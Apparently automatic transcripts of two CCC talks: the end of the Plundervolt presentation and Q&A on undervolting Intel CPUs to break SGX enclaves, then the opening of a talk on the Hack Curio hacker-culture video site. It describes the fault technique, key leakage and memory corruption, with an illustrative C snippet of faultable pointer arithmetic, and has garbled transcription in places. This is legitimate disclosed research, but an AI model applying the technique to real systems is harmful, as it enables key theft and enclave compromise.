It's like we attack crypto in a vault SGX and it's like SG, like the clock screw and like row hammer and like. I don't think that's very catchy, but let me tell you, it's not just crypto. So we're faulting multiplications, so surely there's another use for this other than crypto and this is where something really interesting happens. For those of you who are really good at C, you can come and explain this to me later. This is a really simple bit of C. All I'm doing is getting an offset of an array and taking the address of that and putting it into a pointer. Why is this interesting? Hmm, it's interesting because I want to know what the compiler does with that. So I'm going to wave my magic wand and what the compiler is going to do is it's going to make this. Why is that interesting? Simple pointer arithmetic. Hmm, well, we know that we can fault multiplications. So we're no longer looking at crypto, we're now looking at just memory. So let's see if I can use this as an attack. So let me try and explain what's going on here. On the right hand side, you can see the undervolting. I'm going to create an enclave and I've put it in debug mode so that I can see what's going on. You can see the size of the enclave because we've got the base and the limit of it. And if we look at that in a diagram, what that's saying is here, if I can write anything at the top above that, that will no longer be encrypted, that will be unencrypted. Okay, let's carry on with that. So let's just write that one statement again and again, that pointer arithmetic again and again and again whilst undervolting and see what happens. Ooh, suddenly it changed and if you look at where it's mapped it to, it's mapped that pointer to memory that is no longer in a side SGX. It's put it into untrusted memory. We'll be just doing the same statement again and again whilst undervolting. Bish, we've written something that was in the enclave, out of the enclave and I'm just going to display the page of memory that we've got there to show you what it was. And there's the one line, it's dead beef and again, I'm just going to look in my source code to see what it was. Yeah, it's, you know, you know, end in this, blah, blah, blah. I have now not even used crypto. I have purely used pointer arithmetic to take something that was stored inside Intel's SGX and moved it into user space where anyone can read it. So yes, I get your point. It's more than just crypto, right? Yeah. It's way beyond that. So we leaked RSA keys, we leaked AS keys. Yeah, we did not just that though, we did memory corruption. Okay. So yeah, okay, crypto vaults for hammer point taken is not the ideal name, but maybe you could come up with something. We need a name and a logo. Okay, pressure's on me then. Right, here we go. So it's got to be due to undervolting because we're undervolting. Maybe we can get a pun on vault and vault in there somewhere. We're stealing something, aren't we? We're corrupting something. Maybe maybe we're plundering something. Yeah. No, let's call it plunder vault. Oh, no, no, no, that's not a good name. No, we need something. This is really not a good name. People will hate this name. Wait, wait, wait, wait, wait. You can read this if you like, Daniel. Okay. I think I get it. No, no, I haven't finished. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Yeah, this is really also a very nice comment. Yes, the quality of the videos. I think you did a very good job there. Thank you. Also the website really good job there. 
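The memory-corruption case is worth restating in code, because nothing in it looks like a bug. Below is a hedged reconstruction with an invented struct and names: indexing an array whose element size cannot be synthesized from shifts and adds makes the compiler emit a genuine multiply for the address computation, and that multiply is exactly what the undervolting faults.

```c
/* Sketch: "bug-free" enclave-style code whose address arithmetic hides a faultable
 * multiplication. table[i] compiles to table + i * sizeof(struct record); if that
 * imul is faulted while this runs in a loop, the resulting pointer can land outside
 * the enclave, and the write then leaks the value to untrusted memory. */
#include <stdint.h>

struct record { uint8_t secret[4099]; };   /* size chosen so the scaling needs a real imul */

static uint8_t *locate(struct record *table, uint64_t i)
{
    return table[i].secret;                /* address = table + i * 4099 */
}

void store_secret(struct record *table, uint64_t i, uint8_t value)
{
    uint8_t *p = locate(table, i);         /* a faulted multiply corrupts p ...      */
    *p = value;                            /* ... and this write lands wherever p is */
}
```

That is the whole trick behind the demo above: the enclave itself is unaware anything went wrong, it simply dereferences the pointer it computed.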
So just to summarize what we've done with plunder vault is it's a new type of attack. It breaks the integrity of SGX. It's within SGX, we're doing stuff we shouldn't be able to. Like AES keys, we leak AES keys. And we are achieving the RSA signature key. Yeah. And yes, we induced memory corruption in bug free code. And we made the enclave write secrets to untrusted memory. This is the paper that's been accepted next year. This is my first paper. Thank you very much. Kit, that's me. Thank you. David Oswald, Flavio Garcia, Jo van Bolk and of course the infamous and Frank Peason. So all that really remains for me to do is to say thank you very much for coming. Wait a second. Wait a second. There's one more thing. I think you overlooked one of the tweets. I edited it here. You didn't see the slide yet. I haven't seen this one. I really like it. It's a slightly ponderous pun on Thunderbolt. Pirate themed logo. Pirate themed logo. I really like it. And if it's a pirate themed logo, don't you think there should be a pirate themed song? Daniel. Have you written a pirate themed song? Go on then, play it. Let's hear the pirate themed song. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. We fold the encryption and often we pull for downy and his your hope. Yo ho, yo ho, some underho for me. We fold the signature then we track for downy and his your hope. Or I say we're reasonable, but go attack for downy and his your hope. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. We just take a minute to get the key by for downy and his your hope. We know you're relieved that then we say for downy and his your hope. With the fellow patients out here pray for downy and his your hope. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. Or I got his tricks with a microcohpash for downy and his your hope. Thanks to... Thanks to Manuel Weber and also to my group at Teograd for volunteering for the choir. And then I mean this is not now the last slide. Thank you for your attention. Thank you for being here. And we would like to answer questions in the Q&A. Thank you for a great talk. And thank you Samuel for the song. All right, if you have questions, please line up on the microphones in the room. First question goes to the single angel of any question from the internet. And not that's not for now. All right, then microphone number four, your question please. Hi, thanks for the great talk. So why does this happen now? I mean, thanks for the explanation for Ron, but it wasn't clear. What's going on there? So to... If you look at circuits for the signal to be ready at the output, the electrons have to travel a bit. If you increase the voltage, things will go faster. So you will have the output signal ready at an earlier point in time. Now, the frequency that you choose for your processor should be related to that. So if you choose the frequency too high, the outputs will not be ready at this circuit. And this is exactly what happens. If you reduce the voltage, the outputs are not ready yet for the next clock cycle. And interestingly, we couldn't fault really short instructions. So anything like an add or an X or it was basically impossible to fault. So they had to be complex instructions that probably weren't finishing by the time the next clock tick arrived. Yeah, thank you. Thanks for the answer. Microphone number four again. 
Hello, it's a very interesting theoretical approach, I think. But you were capable to break these crypto mechanisms, for example, because you could do zillions of iterations and you are sure to trigger the fault. But in practice, say someone is having a secure conversation, is it practical, even close to possible to break it with that? It totally depends on your threat model. So what can you do with the enclave? If you we are assuming that we are running with root privileges here and a root privileged attacker can certainly run the enclave with certain inputs again and again. If the enclave doesn't have any protection against replay, then certainly we can mount an attack like that. Yes. Thank you. Seenle Angel, your question. Somebody asked if the attack only applies to Intel or to AMD or other architectures as well. Good question. I suspect right now there are people trying this attack on AMD. In the same way that when Clock Screw came out, there were an awful lot of people starting to do stuff on Intel as well. We saw the Clock Screw attack on ARM with frequency. Then we saw ARM with voltage. Now we've seen Intel with voltage. And someone else has done similar, a voltpone has done something very similar to us. And I suspect AMD is the next one. I guess because it's not out there as much, we've tried to do them in the order of scaring people. Scaring as many people as possible as quickly as possible. Thank you for the explanation. Microphone number four. Hi. Thanks for a representation. Can you get similar results by hardware? I mean by tweaking the voltage that you provide to the CPU? Well, I refer you to my earlier answer. I know for a fact that there are people doing this right now with physical hardware seeing what they can do. And I think it will not be long before that paper comes out. Thank you. Thanks. Microphone number one, your question. Sorry. Microphone four again. Sorry. Hi. Thanks for the talk. Two small questions. One, why doesn't anything break inside a GX when you do these tricks? And second one, why when you write outside the enclave's memory, the value is not encrypted? So the enclave is an encrypted area of memory. So when it points to an unencrypted, it's just going to write it to the unencrypted memory. Does that make sense? From the enclave's perspective, none of the memory is encrypted. This is just transparent to the enclave. So if the enclave will write to another memory location, yes, it just won't be encrypted. And what's happening is we're getting flips in the registers, which is why I think we're not getting an integrity check. Because the enclave is completely unaware that anything's even gone wrong. It's got a value in its memory and it's going to use it. The integrity check is only on the memory that you load from RAM. Okay. Microphone number seven. Yeah. Thank you. Interesting work. I was wondering, you showed us the example of the code that wrote outside the enclave memory using simple pointer arithmetic. Have you been able to talk to Intel why this memory access actually happens? I mean, you showed us the output of the program. It crashes. But nevertheless, it writes the result to the resulting memory address. So there must be something wrong like the attack that happened two years ago at the Congress about, yeah, you know, all that stuff. So generally, enclaves can read and write any memory location in their host application. We have also published papers that basically argue that this might not be a good idea, good design decision. 
But that's the current design. And the reason is that this makes interaction with the enclave very easy. You can just place your payload somewhere in the memory, hand the pointer to the enclave, and the enclave can use the data from there. Maybe copy it into the enclave memory if necessary or directly work on the data. So that's why this memory access to the normal memory region is not illegal. And if you want to know more, you can come and find Daniel afterwards. Okay. Thanks for the answer. Single Angel, the question from the Internet. Yes. And the question came up if how stable the system you're attacking with the hammering is while you're performing the attack. It's really stable. Once I'd been through three months of crashing the computer, I got to a point where I had a really, really good frequency voltage combination. And we did discover on all Intel chips, it was different. So even what looked like an app we bought almost an identical little nook. We put one with exactly the same spec and it had a different sort of frequency voltage model. But once we've done this sort of benchmarking, you could pretty much do any attack without it crashing at all. Yeah. But without this benchmarking, it's true we would often rebuild. Oh, it was a nightmare. Yeah. I wish I'd done that at the beginning. It would have saved me so much time. Thanks again for answering. Microphone number four, your question. Can Intel fix this with a microcode update? So there are different approaches to this. Of course, the quick fix is to remove the access to the MSR, which is of course inconvenient because you can't undervolt your system anymore. So maybe you want to choose whether you want to use SGX or want to have a gaming computer where you undervolt the system or control the voltage from software. But is this a real fix? I don't know. I think there are more vectors, right? Yeah. Well, I'd be interested to see what they're going to do with the next generation of chips. Yeah. Right. Microphone number seven, what's your question? Yeah, similarly to the other question, is there a way you can prevent such attacks when writing code that runs in the secure enclave? Well, no, that's the interesting thing. It's really hard to do because we weren't writing code with bugs. We were just writing normal pointer arithmetic, normal crypto. If anywhere in your code you're using a multiplication, it can be attacked. But of course, you could use fault resistant implementations inside the enclave. Whether that is a practical solution is yet to be determined. Yeah, you could write Jupy code and do comparison things like that. But if, yeah. Okay. Microphone number three, what's your question? Hi, I can't imagine Intel being very happy about this and recently they were under fire for how they were handling coordinated disclosure. So can you summarize experience? They were really nice. They were really nice. We disclosed really early, like before we had all of the attacks. We just had a pock at that point. Yeah. The simple pock, very simple. They've been really nice. They wanted to know what we were doing. They wanted to seal our attacks. I found them lovely. Yes. Well, I'd say that. I mean, they also have interest in making these processes smooth so that vulnerability researchers also report to them. Because if everyone says, oh, this was awful, then they will also not get a lot of reports. But if they do their job well and they did in our case, then of course, it's nice. Okay, microphone number four. We even got a bug bounty. 
We did get bug bounty. I didn't want to mention that because I haven't told my university yet. Thank you for the funny talk. If I understood you right, it means to really be able to exploit this. You need to do some benchmarking on the machine that you want to exploit. Do you see any way to convert this to a remote exploit? I mean, to me, it seems you need physical access right now because you need to reboot the machine. If you've done benchmarking on an identical machine, I don't think you would have to have physical access. But you would have to make sure that it's really an identical machine. But in the cloud, you will find a lot of identical machines. Okay, microphone number four again. Also, as we said, the temperature plays an important role. You will also find a lot of machines at similar temperatures. There's a lot of stuff we didn't show you. We did start measuring the total amount of clock ticks it took to do maybe 10 RSA encryptions. Then we did start doing very specific timing attacks. But obviously, it's much easier to just do 10,000 of them and hope that one falls. Alright, seems there are no further questions. Thank you very much for your talk. For your research and for answering all the questions. Thank you. Thank you.
We present the next step after Rowhammer, a new software-based fault attack primitive: Plundervolt (CVE-2019-11157). Many processors (including the widespread Intel Core series) expose privileged software interfaces to dynamically regulate processor frequency and operating voltage. We show that these privileged interfaces can be reliably exploited to undermine the system's security. In multiple case studies, we show how the induced faults in enclave computations can be leveraged in real-world attacks to recover keys from cryptographic algorithms (including the AES-NI instruction set extension) or to induce memory safety vulnerabilities into bug-free enclave code. Fault attacks pose a substantial threat to the security of our modern systems, allowing to break cryptographic algorithms or to obtain root privileges on a system. Fortunately, fault attacks have always required local physical access to the system. This changed with the Rowhammer attack (BlackHat USA 2015, CCC 2015), which for the first time enabled an attacker to mount a software-based fault attack. However, as countermeasures against Rowhammer are developed and deployed, fault attacks require local physical access again. In this CCC talk, we present the next step, a long-awaited alternative to Rowhammer, a second software-based fault attack primitive: Plundervolt. Dynamic frequency and voltage scaling features have been introduced to manage ever-growing heat and power consumption in modern processors. Design restrictions ensure frequency and voltage are adjusted as a pair, based on the current load, because for each frequency there is only a certain voltage range where the processor can operate correctly. For this purpose, many processors (including the widespread Intel Core series) expose privileged software interfaces to dynamically regulate processor frequency and operating voltage. In this talk, we show that these privileged interfaces can be reliably exploited to undermine the system's security. We present the Plundervolt attack, in which a privileged software adversary abuses an undocumented Intel Core voltage scaling interface to corrupt the integrity of Intel SGX enclave computations. Plundervolt carefully controls the processor's supply voltage during an enclave computation, inducing predictable faults within the processor package. Consequently, even Intel SGX's memory encryption/authentication technology cannot protect against Plundervolt. In multiple case studies, we show how the induced faults in enclave computations can be leveraged in real-world attacks to recover keys from cryptographic algorithms (including the AES-NI instruction set extension) or to induce memory safety vulnerabilities into bug-free enclave code. We finally discuss why mitigating Plundervolt is not trivial, requiring trusted computing base recovery through microcode updates or hardware changes. We have responsibly disclosed our findings to Intel on June 7, 2019. Intel assigned CVE-2019-11157 to track this vulnerability and refer to mitigations. The scientific paper on Plundervolt will appear at the IEEE Security & Privacy Symposium 2020. The work is the result of a collaboration of Kit Murdock (The University of Birmingham, UK), David Oswald (The University of Birmingham, UK), Flavio D. Garcia (The University of Birmingham, UK), Jo Van Bulck (imec-DistriNet, KU Leuven, Belgium), Daniel Gruss (Graz University of Technology, Austria), and Frank Piessens (imec-DistriNet, KU Leuven, Belgium).
10.5446/53147 (DOI)
The speakers that I have on stage today are both anthropologists and they are both experts on hacking culture. Today they also launched their website, hackcur.io, which is also the name of the talk: Hack Curio, decoding the cultures of hacking one video at a time. I welcome Gabriella, aka Biella, Coleman and Paula Bialski. Hello. Hello, hello, hello. Do you hear us? Good evening, CCC. It's so lovely to be here. We are super excited to stand before you here today and present a project we've been working on for the past year or so. That would not have been finished if it were not for this talk. Exactly. So thank you. Exactly. Thanks for forcing us to stand before you. And get away from our desks. Let's drink some wine, have some 11.30pm discussion with you. And there's no better place to launch the project that we're going to show you than at the CCC. So we're super excited to be here. Let's start with the very basics. What is Hack Curio? What is it that you guys are going to see in the next hour or so? Hack Curio is a website featuring short video clips all related to computer hackers. Now, a bit of background. My name is Paula Bialski and I am a sociologist. I'm an ethnographer of hacker cultures. I study corporate hacker developers. And for those of you who don't know me, I'm Biella Coleman. I'm an anthropologist. I also study computer hackers. And we, along with Chris Kelty, have helped to put this website together. Exactly. And in the past year, we've decided to come together and bring all sorts of clips from public talks, from documentaries, from Hollywood films, from memes, from advertising, all sorts of sources. We've brought together these videos, which also come with short descriptions by authors, by scholars, by journalists, by people who know something about hacker cultures. And we brought that all together in one place. So call it a museum, call it a compendium, call it a website. And it's a place to really pay homage to you guys. Because hackers come in all shapes and sizes. What it means to hack might mean one thing to you, but something very different to the person next to you. And as anthropologists, we think it's very important how a culture gets represented. We're not just hackers in hoodies. It's a really diverse culture. So we're going to talk about that today. Alright, so how did this project come into being? Like, why are we here? Why did we spend the last year doing this? Well, you know, first of all, I didn't create it because I had this idea in mind. It was created because I started to collect videos for a reason. I'm a professor, and twice a week I stand in front of students who are on the internet, on Facebook, maybe buying shoes. And it's really hard to get their attention. And you know what? I found using videos in class was an amazing way to get them off Facebook and paying attention to moi, to me. Right? So over the years, I just collected a lot of videos, right? Video after video after video after video. And at a certain point, I was like, you know, I have this private collection, semi-private collection, that I use in class. Why don't I transform it into a public resource? And more so, as someone who has studied hackers for many years, why don't I make it into a collaborative project? Why don't I tap into the kind of expertise that exists among hackers and journalists and researchers and academics and draw them in? And so I decided to do that, right?
And so about a year and a half ago, I brought together a couple of other people like Paula, Chris Kelty, who's another curator, and I said, like, let's get this going. So when we were kind of fashioning the project, we were also thinking like, what are we trying to do with this project, right? You're not my students. I don't see you twice a week. And so we came up with some goals and we don't know if we're going to achieve these goals. The site literally is going live like right now. But this is what we're trying to do with the project. We're trying to chip away at some plastic conceptions and stereotypes of hackers. We know these exist. Can we chip away at them, right? We want to offer new perspectives on what hackers have actually done and what they do. A really important thing which Paula has already kind of mentioned is showcase the diversity of hacking, right? People who do blockchain and free software and security. I mean, there's similarities, but there's also differences. Like, let's try to show this. And while this is not an archive, this is not the Internet Archive, we are trying to kind of preserve bits and bytes of hacker history. So these are the four goals and we do feel that video, right, is a nice medium, a mechanism to achieve these four goals. It's persuasive. It's compelling. It's memorable. It's fun. Like we like to waste time at work on video, right? So we're like, hey, let's add a little persuasive punch to text. And this is why we decided to do it this way. Exactly. So what happens when you click on the site today and how is it organized? We want to show you a little bit of the actual architecture of the site itself. So you can go, when you click on the website, you see certain categories. We've grouped the videos into different categories. Because as you say, there's a huge diversity. So you can see here, Biela is lovely here pointing out the beautiful categories. We've got anti security hackers, blockchain hackers. We've got free and open the software. We've got freaking. We've got hacker depictions. You can look at all sorts of different categories. You go onto a category website and then you have a blurb about what this subculture of hacking is all about or what this category is. Exactly. What the theme is. And then you have all sorts of little videos that last maybe 30 seconds, maybe a few minutes. And under these videos, you would look at the video and then you would have a little bit of a blurb. It's not an essay. It's not a book. It's not some boring academic text. It's supposed to be funny. It's supposed to be for your grandmothers to read. It's supposed to be actually accessible and understandable. So you have the video and the actual text itself. This is how it looks like. And this is maybe some sample of our content itself. What do we have? We've got 42 entries at the moment, which we've collected from, as I said, various different academics with different authors. And by the end of 220, we would love to have around 100 entries. And we'd try to publish around 50 or 20 entries a year. After that. Because it's really brutally hard to edit academics. Exactly. Exactly. And so we've got what you'll find. These are just some examples. We'll get into some really of the videos in just a moment. But for example, you would look at hackers and engineers humming at the Internet Engineering Task Force. Or you'd look at an entry that's about the programming legend of course, Grace Hopper being interviewed by a clue is David Letterman. 
Maybe you guys have seen this video. A blockchain ad that, when people see it, makes them ask: is this real? It's kind of a wacky ad. Or is it parody? And when you watch it, you have to know that it is actually quite real. The actor Robert Redford showing off his mad social engineering skills with the help of cakes and balloons. Or how to make sense of why Algerian hacker Hamza Bendelladj, arrested by the US government, smiles, and how many people from Algeria understand his grin. So this is the kind of diversity of what hacking is really all about. But we're here to get the video party started. Exactly. Finally. So let's get it started. Yeah. A little background. Exactly. Okay. So we'd, yes. Yeah, you start. You start. All right. So we thought it would be a good idea to start with phone phreaking, because phone phreaking really developed at the same time as, if not kind of before, computer hacking. And we're going to show Joybubbles, Joe Engressia, who is, you know, often considered to be the grandfather of phone phreaking. So let's go to a video. Make their calls. In the days when calls went through the operators, phone phreaking wasn't possible. But as human switchboards were replaced by mechanical systems, different noises were used to trigger the switches. If you had perfect pitch like blind phone phreak Joe Engressia, you could whistle calls through the network. Let's see if I make it this time. This is really hard to do. It sounded like all the tones were present. So it should be ringing about now. Okay. It hit the phone. It just takes a little while. He even showed off his skills for the local media. Now, from his one phone to a town in Illinois and back to his other phone, a thousand mile phone call by whistling. Joe Engressia. All right. Very cool. Right. So Joe Engressia is featured, and Joan Donovan, who is like a mad researcher at Harvard University, wrote a really awesome entry about that. And, you know, of course, she emphasizes things like, you know, while hacking is often tied to computers, it can be about any system that you could understand, improve, fix, undermine. And the phreakers really showed that, right? And of course, the history of phone phreaking is about blind kids. Not everyone who was a phreak was blind, but many of them were. They met each other in camp and kind of exchanged information. And that was one of the ways in which phone phreaking grew. Phone phreaking really grew as well when a big article was published in 1971 by Ron Rosenbaum in Esquire magazine. Who here has read that article? Has anyone? It's incredible. We mention it, I think, in the piece. Check it out. Phone phreaking exploded after that article. The spelling of phreaking changed from freak with an f to phreak with a ph because of that article. Phreaking also grew when blue boxes were created, right? This is also something that Joan writes about in her entry. One of the cool things that Joan writes about, and then I'm going to turn it over to Paula again, is that some phreaks trained birds. Okay. A phreaking bird. Let's just leave it at that, because that's freaking cool. All right. Okay. Are you guys ready now to cringe? We need a little bit of a cringing moment as well. So without further ado, this is Steve Ballmer, who would like to do some dancing. From Microsoft: ladies and gentlemen, Steve Ballmer. Come on. Okay. Yeah, that's right. Can I just say one little thing? There's a remix of this with goats screaming. Like, look it up. It's awesome. I love it, exactly.
But why do we show Steve Ballmer, the sort of, like, godfather? Exactly. Kind of an anti-hacker of sorts. I myself am an ethnographer who works on the corporate culture of software developers, who aren't hackers per se. But if you think of a figure like Steve Ballmer: a lot of you guys who perhaps identify as hackers, you have day jobs. You go to work and you have to make some money in order to live and to work on your own projects. And you often have to face sort of mini Steve Ballmers at work. And this is a quote from my own entry, which sits right next to this video of Steve Ballmer. Even if Ballmer's unbridled display of exuberance is exceptional, many software developers still have to deal with mini Steve Ballmers every day in their work. We're sorry that you do, but if you do, you do. Exactly. So this exuberance is all about these sorts of slogans: win big, save the world while building technology, be awesome, be true, whatever your corporate slogan is. And there is, I think, a way in which software developers, and the hackers who work in these day jobs, challenge this really intense exuberance of wearing your corporate t-shirt and smiling every day: you hack your daily projects, you work on your own private projects on the side. You actually do have many small acts of resistance to this kind of loud, massive exuberance. And I talk about these sorts of sideline mini hacks that happen in everyday corporate culture. Check out her entry. It's really funny. All right. So now we're going to a hacktivist. So who here has heard of Phineas Fisher? All right. Awesome. Just in case, for those who are watching the video now or later, I'm going to give a little bit of background. But I love this video about Phineas Fisher because he explains what he or the group has done, but he also does kind of a very clever media hack. So for those that don't know who Phineas Fisher is, he or the group is a hacktivist who claims to be inspired by Anonymous and Jeremy Hammond. He's hacked into various corporations, from FinFisher to Hacking Team. And what he did was take documents, take email, and then publish them. And these were important in ways that I'll talk about in a moment. He's donated, I think, stolen Bitcoin to the Rojava government. And this fall, he published a manifesto kind of calling for public interest hacking and claims he would give $100,000 to anyone who does this. So now I'm going to show the first, and I believe the only, interview that he has done. And he did this with Vice News a couple of years ago. Let's do this. These are the exact words from our live text exchange, voiced by one of my colleagues. So why did you hack Hacking Team? Well, I just read the Citizen Lab reports on FinFisher and Hacking Team and thought, that's fucked up. And I hacked them. What was the goal in hacking the Hacking Team data? Were you trying to stop them? For the lulz? I don't really expect leaking data to stop a company, but hopefully it can at least set them back a bit and give some breathing room to the people being targeted with their software. Okay, so this does not yet exist on Hack Curio. I have to write the entry, but because I was so busy getting the whole site ready, I haven't done it, but it will happen in the next few weeks. But what I love about this video is, first of all, he's, like, hacking media representations, right?
I mean, even when awesome journalists like Motherboard publish on hackers or other kind of entities, they still kind of use a masked hacker. Even once they published about Phineas Fisher and they put like a mask on him. And I was like, hackers have heat. Like they don't need a mask, right? And there is this sense where there's always a kind of demonic mask figure. And he was like, okay, I'll do this interview, but you have to represent me as like a lovable, Muppet-like figure, right? So he's there hacking the media. But what's also really interesting, and do watch the full video, it's kind of amazing, is that, you know, he kind of claims, oh, I didn't have much of infect. I don't think he could do anything. But in fact, first of all, the information that was released really reaffirmed what people suspected. For example, in the case of hacking team who was selling problematic exploits by way to dictatorial regimes, we really got a confirmation that this was happening. And in fact, eventually, hacking team even lost their license, right? So this was like a direct effect from what Phineas Fisher did. So really, it's a kind of amazing video that showcases what he was doing, his reasoning, and then with a performance, literally, a puppet that hacked the media. Okay, so now we're going to rewind a little bit and go back in time. So a lot of hackers care about cryptography, right? And ever since the cypherpunks, and since that period, there have been projects from Tor to Signal that have enabled cryptography that has been really important for human rights activists and others. But one of the great, great kind of encryption projects came from this fellow, Tim Jenkins. Who here in the room has heard of Tim Jenkins? Okay, this is amazing. This is why we're doing kind of hack-kirry-o. So Tim Jenkins is from South Africa. And beginning in 1988, secret messages were sent and received regularly across South Africa borders using an encrypted telematics system assembled during the final years of the South African liberation struggle. And Tim Jenkins, along with Ronnie Press, who has since passed away, created the system. And Tim Jenkins was kind of like a phone freak, and that was one of the reasons he was good at working with phones. And what was amazing about this system, which was part of Operation Vula, was that it allowed people in South Africa to communicate with leaders in exile in London, right? And Tim Jenkins created this system. And we're going to show a video about it in a moment, and Sophie Tupin has written a terrific entry. The reason why we have him with a key there was that, like, you know, the South African apartheid government did not really like Tim Jenkins, so they threw him in jail. Well, a lot of hackers lockpick. He actually created 10 wooden keys secretly in the wooden shop and broke out of jail. And we can talk about, like, taking lockpicking to, like, another sort of level. All right, so let's listen and see the video about this incredible program. After we sent in the first computer, we expected things to start immediately, but it actually took a couple of weeks. And then suddenly one day I was sitting at my desk and the telephone answering machine suddenly started worrying. I thought, no, this must be just absolutely wrong number or something. But then sure enough, I heard the distinctive tones of the messages and I could hear this thing coming through. The tape word and word and word, and then it stopped and I loaded the message onto my computer. 
In fact, it was a report from Mac. And sure enough, there was our first message, absolutely perfect. The fax machine. Okay, so this is from the entry by Sophie Tupin, who is writing a dissertation on this topic. The international hacker community has since taken notice of Tim Jenkins and the Vula and cryptic communication system that embodies so many qualities often associated with an exceptional hack. Elegant, clever, usable and pragmatic, right? Jenkins has been invited to speak at the Berlin-Logan symposium in 2016 and to the lockpicking communities in the Netherlands and the United States. In 2018, the RSA security conference gave Jenkins the first award for excellence in humanitarian service. So just like one last thing, this is a good reminder that histories of computer hacking are often skewed. They often actually start with the United States, when for example in Europe with a CCC, that story has been told in bits and pieces, but deserves a much longer or much larger showcase. And actually, this example also shows that for example, the history of encryption when it comes to communication didn't even necessarily start in the United States, right? And so it's really, really important to kind of showcase these histories that haven't been told elsewhere. Exactly. So maybe by now you're kind of getting at the fact that we see hacking as a diverse practice, hackers as a diverse group of people who do different things. And at the moment, I want to come back to ways in which hackers challenge power through challenging really the very stereotype of what gender means, then challenging really gender politics. And it will turn to this topic by looking at an entry that a woman named Christina Dunbar-Hester has done on a woman named Naomi Cedar. And some of you probably know Naomi Cedar. This is part of her entry and she wrote, Naomi Cedar is a programmer and core participant in the Python programming language community. As a trans identified person, Cedar grappled with whether she would have to give up everything in order to transition and whether the community would accept her for doing so. So let's watch a clip of the video and let's see how Naomi Cedar challenged that. And one thing she gave this talk at PyCon, the Python open-source developer conference. And it's a really incredible talk. I really encourage you to watch the whole talk, but this is the moment where she's like, do I have to leave the community? Or can I transition in the community? Exactly. So let's watch a tiny clip of that. I decided that to do that would probably mean giving up everything. Remember back at 13, I had absorbed this into my brain that the only way you were going to get out of this was to basically leave everything. And this was a very painful thing to think about, but like a lot of trans people, I had come to the point where even if I lost everything, that was fine. So I started to think about other alternatives here. I had toyed with the idea of doing the education summit as a farewell thing to the community. I would do it and then disappear, go into the trans witness protection program. The only problem was I actually started accelerating the pace of my transition because, well, it was just such a freaking relief to start moving in that direction. That that wouldn't work. So I actually thought about what was for me, harking back to Leveron Cox, a very revolutionary idea. What if I just did it and was open about it? First thing I looked at, codes of conduct. I looked for specifics. 
What happens to me if there is a problem, if I am harassed? This was important to me. Other thing I did was I started telling a few people, Jesse Noller, Ava Yadloska, some people I would work with on PyCon, and they were all pretty cool with the idea. And the more I talked about it, the more I decided that I would go ahead and take that chance. So I did. I started by teaching at some Python workshops for women. I spoke at some conferences. We went to PyCon. It was good. The education summit was fine. Okay, some of the people I worked with in organizing it were a little bit confused when the names on the emails changed. I apologize. But in general, it went pretty well. In fact, the more open I was, the easier it was for me because I didn't have to worry about being outed. And it was easier for other people because they certainly knew what to expect. The other interesting side light is that when I told people, they sometimes felt an obligation to share some deep dark secret about themselves. I kind of trumped them and they had to answer back. So my takeaway here is that we talk a lot about diversity and that's real. So we should be ending on this point except that I'm a contrarian in my old age. So it is not quite all rainbows and unicorns. Or as you might put it, this is kind of common in social justice circles right now. We don't get a cookie. Exactly. All right. And yeah. It's a very powerful play. Exactly. And I guess we could also say that the next step I want to show that after the entry by Christina Dunbar-Hester, Naomi Cedar actually gave a response to this entry, which we've also published, which we also want to do. We want to have a discussion between some of the responses to the actual entries themselves. It's very powerful. So we actually wanted to quote it in full. Yeah, exactly. So perhaps let's read this section from the response of Naomi Cedar. PyCon itself has continued to evolve into an ever more diverse place with an ever stronger representation of queer folks, people of color, people who speak different languages, et cetera. Codes of conduct are nearly universal these days. And more often than not, communities insist that they be well-crafted and meaningful and backed up by real enforcement. Even in these retrograde times of official attacks on the rights of so many groups, we have come a long way. But just as I said five years ago, it's still not all rainbows and unicorns. Too many groups throughout the open source world globally are making only token efforts to foster inclusion. And in my opinion, too many members of privileged groups tend to focus on superficial or cosmetic changes rather than addressing the underlying fundamental issues marginalized groups face. It doesn't take a bit away from how far we've come to also acknowledge how much we still have to do in Naomi Cedar. So this really part, we wanted to discuss this in the way in which hacking is also a practice of challenging power, challenging stereotypes, and challenging really gender norms in many ways. All right, let's move on. All right, so the final frontier. We have three more videos to show before we get to the Q&A. In all videos relate to geopolitics and hacking. You know, hacking has always been political in some fashion. If for no other reason than sometimes laws are challenged or you're doing something that someone doesn't want you to do, right? 
But there's only been certain moments where nation states have been interested in hacking, or there have been sort of ways in which nation states have used hacking, for example, recently in order to kind of engage in international politics. So we're going to kind of focus on these last, the last three videos will focus on these issues. We're at the CCC, so of course I wanted to show a video related to CCC. Unfortunately, I don't have one related to the German CCC, please do send good videos related to the CCC to me. But I am going to show one related to the FCCC, established in Lyon by Jean Bernard Condat. So do people know what the F stands for? All right. Okay, what's going on here? What does it stand for? French. French. Okay. Once you see the video. Hold on. You will also see that it stands for fake and fuck as well. Because basically the French chapter of the CCC was established in part to try to entrap hackers in order to kind of work for the French government. It's a fascinating story that's been told in bits and pieces. And I'm going to say a little bit more about it, but now I'm going to show a clip from a French documentary that kind of charts a little bit of that history. It's in French with subtitles. And quickly, the different teaching services have all tried to integrate the skills of these network users. We arrived at 6am to arrive at a pavilion located in the province, around, and to knock on the door to say, here is the police, the purchasing, to have parents who will open our eyes. And we say, my son, my son, but he never left his room, he's always in his room, etc. In fact, it was a very pious pirate and he was younger. So that means that we are to make a new population. We are a little bit immune to this problem. And we couldn't recruit people like that for the house. On the other hand, why wouldn't we do the national service of people who are interested in the national service? Of people who are well-known, who could work not in the shadow, but for the nation. So we started to recruit people. At the time, we didn't say to the heart, we said to the pirate, who helped us understand. In France, it was the time when the undergrounds of the DST, the Baleno, recruited by General Guillaume, alias the Baleno. I was only there for the first year, I was only there for the second year, and then it was my turn until the 15th. I received all of them personally before, so I had to open the shopping centers, the profits I was looking for. I received the guys and I selected them according to the way of the mood. The more I laughed, the more serious it was for me. Because you have to be crazy to do that, you have to have fun. Every year we had a new Baleno, and every year, he could bring us something new. But they were the most vulnerable people. Others were proud of themselves, because they were trialed on the flight. The KGB did the same thing as we did, since they didn't have many doctors, they were just like Jesus, and they detected people who were actors, and they told them, listen, instead of having fun, I'll pay you a little more if you go and see such or such systems. The Americans didn't like it. In 1991, I'm on a TV show and I see an actor, a presenter called 